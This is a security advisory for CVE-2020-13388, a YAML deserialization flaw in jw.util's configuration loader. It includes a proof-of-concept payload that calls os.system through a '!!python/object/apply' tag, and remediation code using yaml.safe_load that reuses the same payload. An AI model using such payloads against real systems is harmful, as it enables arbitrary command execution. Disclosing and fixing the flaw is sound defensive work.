CVE-2020-13388: vulnerability in jw.util

Python Package: jw.util

Version: <= 2.3

Reported by: Joel

CVE: CVE-2020-13388

Overview

An exploitable vulnerability exists in the configuration loading functionality of jw.util before 2.3. jw.util.configuration is a module for handling configuration from a YAML source, together with a class that simplifies access to the resulting configuration tree. Loading configuration from a string or stream parses the YAML with an unsafe loader, so a YAML document can instantiate arbitrary Python objects, which results in command execution. An attacker who controls the loaded YAML can insert Python object tags to trigger this vulnerability.

POC

# Both entry points hand the document to a full (unsafe) YAML loader,
# so the !!python/object/apply tag is constructed, calling os.system.
from jw.util import configuration
configuration.FromString('!!python/object/apply:os.system ["calc.exe"]')
configuration.FromStream('!!python/object/apply:os.system ["calc.exe"]')

Remediation

The configuration loader should use yaml.safe_load (PyYAML's SafeLoader) to parse the YAML file. SafeLoader only knows the standard YAML types (mappings, sequences, scalars) and refuses !!python/... tags with a ConstructorError instead of constructing arbitrary objects, so the document is rejected before any code runs.
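A hardened loader showing the remediation, added here as an example (not jw.util's own code). It assumes PyYAML is installed; the function and class names, the benign configuration document and the error wrapper are constructed for illustration.

```python
"""Safe YAML configuration loader: safe_load instead of a full loader."""
import io
from typing import Any, Union

import yaml  # PyYAML
from yaml.constructor import ConstructorError


class UnsafeConfigError(ValueError):
    """Raised when a YAML document uses tags the safe loader refuses."""


def load_config(source: Union[str, io.IOBase]) -> Any:
    """Parse YAML configuration from a string or a text stream.

    yaml.safe_load uses SafeLoader, which knows only plain YAML types.
    Any !!python/... tag (including the long form
    !<tag:yaml.org,2002:python/...>) is rejected with a ConstructorError
    before an object is built, so nothing is executed.
    """
    try:
        return yaml.safe_load(source)
    except ConstructorError as exc:
        # Report the rejection as a configuration error rather than a crash.
        raise UnsafeConfigError(f"refused YAML document: {exc.problem}") from exc


def is_rejected(source: Union[str, io.IOBase]) -> bool:
    """True if the loader refuses the document, False if it parses."""
    try:
        load_config(source)
    except UnsafeConfigError:
        return True
    return False


def as_stream(text: str) -> io.StringIO:
    """Wrap a string as a stream, mirroring the FromStream entry point."""
    return io.StringIO(text)


# Constructed sample input: an ordinary configuration tree.
BENIGN = "database:\n  host: localhost\n  port: 5432\n"

# The POC document from the advisory; safe_load refuses it instead of running it.
POC = '!!python/object/apply:os.system ["calc.exe"]'

if __name__ == "__main__":
    print(load_config(BENIGN))
    print("POC rejected:", is_rejected(POC))
```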